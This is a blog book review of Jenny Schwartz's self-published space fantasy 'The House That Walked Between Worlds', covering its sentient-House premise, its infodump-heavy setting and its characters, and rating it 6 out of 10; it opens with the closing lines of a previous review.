Content notes: Lots of violent death and other physical damage, creepy dream worlds with implied but not explicit horror, and rather a lot of blood.

Followed by The Last Soul Among Wolves, not yet published at the time I wrote this review.

Rating: 8 out of 10

23 December 2024

Russ Allbery: Review: The House That Walked Between Worlds

Review: The House That Walked Between Worlds, by Jenny Schwartz
Series: Uncertain Sanctuary #1
Publisher: Jenny Schwartz
Copyright: June 2020
Printing: September 2024
ASIN: B0DBX6GP8Z
Format: Kindle
Pages: 215
The House That Walked Between Worlds is the first book of a self-published trilogy of... hm. Space fantasy? Pure fantasy with a bit of science fiction thrown in for flavor? Something like that. I read it as part of the Uncertain Sanctuary omnibus, which is reflected in the sidebar metadata.

Kira Aist is a doctor. She's also a witch and a direct descendant of Baba Yaga. Her Russian grandmother warned her to never use magic and never reveal who she was because people would hunt her and her family if she did. She broke the rule to try to save a child, her grandmother was right, and now multiple people are dead, including her parents. As the story opens, she's deep in the wilds of New Zealand in a valley with buried moa bones, summoning her House so that she can flee Earth.

Kira's first surprise is that her House is not the small hut that she was expecting from childhood visits to Baba Yaga. It's larger. A lot larger: an obsidian castle with nine towers and legs that resemble dragons rather than the moas whose magic she drew on. Her magic apparently had a much different idea of what she needed than she did.

Her second surprise is that her magical education is highly incomplete, and she is not the witch that she thought she was. Her ability to create a House means that she's a sorcerer, the top tier of magical power in a hierarchy about which she knows essentially nothing. Thankfully the House has a library, but Kira has a lot to learn about the universe and her place in it.

I picked this up because the premise sounded a little like the Innkeeper novels, and since another novel in that series does not appear to be immediately forthcoming, I went looking elsewhere for my cozy sentient building fix. The House That Walked Between Worlds is nowhere near as well-written (or, frankly, coherent) as the Innkeeper books, but it did deliver some of the same vibes.

You should know going in that there isn't much in the way of a plot. Schwartz invented an elaborate setting involving archetype worlds inhabited by classes of mythological creatures that in some mystical sense surround a central system called Qaysar. These archetype worlds spawn derived worlds, each of which seems to be its own dimension, although the details are a bit murky to me. The world Kira thinks of as Earth is just one of the universes branched off of an archetypal Earth, and is the only one of those branchings where the main population is human. The other Earth-derived worlds are populated by the Dinosaurians and the Neanderthals. Similarly, there is a Fae world that branches into Elves and Goblins, an Epic world that branches into Shifters, Trolls, and Kobolds, and so forth. Travel between these worlds is normally by slow World Walker Caravans, but Houses break the rules of interdimensional travel in ways that no one entirely understands.

If your eyes are already starting to glaze over, be warned that there's a lot of this. The House That Walked Between Worlds is infodumping mixed with vibes, and I think you have to enjoy the setting, or at least the sheer enthusiasm of Schwartz's presentation of it, to get along with this book.

The rest of the story is essentially Kira picking up strays: first a dangerous-looking elf cyborg, then a juvenile giant cat (because of course there's a pet fantasy space cat; it's that sort of book), and then a charming martial artist who I'm fairly sure is up to no good. Kira is entirely out of her depth and acting on instinct, which luckily plays into stereotypes of sorcerers as mysterious and unpredictable.
It also helps that her magic is roughly "anything she wants to happen, happens."

This is, in other words, not a tightly-crafted story with coherent rules and a sense of risk and danger. It's a book that succeeds or fails almost entirely on how much you like the main characters and enjoy the world-building. Thankfully, I thought the characters were fun, if not (so far) all that deep. Kira deals with her trauma without being excessively angsty and leans into her new situation with a chaotic decisiveness that I found charming. The cyborg elf is taciturn and a bit inscrutable at first, but he grew on me, and thankfully this book does not go immediately to romance. Late in the book, Kira picks up a publicity expert, which was not at all the type of character that I was expecting and which I found delightful.

Most importantly, the House was exactly what I was looking for: impish, protective, mysterious, inhuman, and absurdly overpowered. I adore cozy sentient building stories, so I'm an easy audience for this sort of thing, but I'm already eager to read more about the House.

This is not great writing by any stretch, and you will be unsurprised that it's self-published. If you're expecting the polish and plot coherence of the Innkeeper stories, you'll be disappointed. But if you just want to spend some time with a giant sentient space-traveling mansion inhabited by unlikely misfits, and you don't mind large amounts of space fantasy infodumping, consider giving this a shot. I had fun with it and plan on reading the rest of the omnibus.

Followed by House in Hiding.

Rating: 6 out of 10
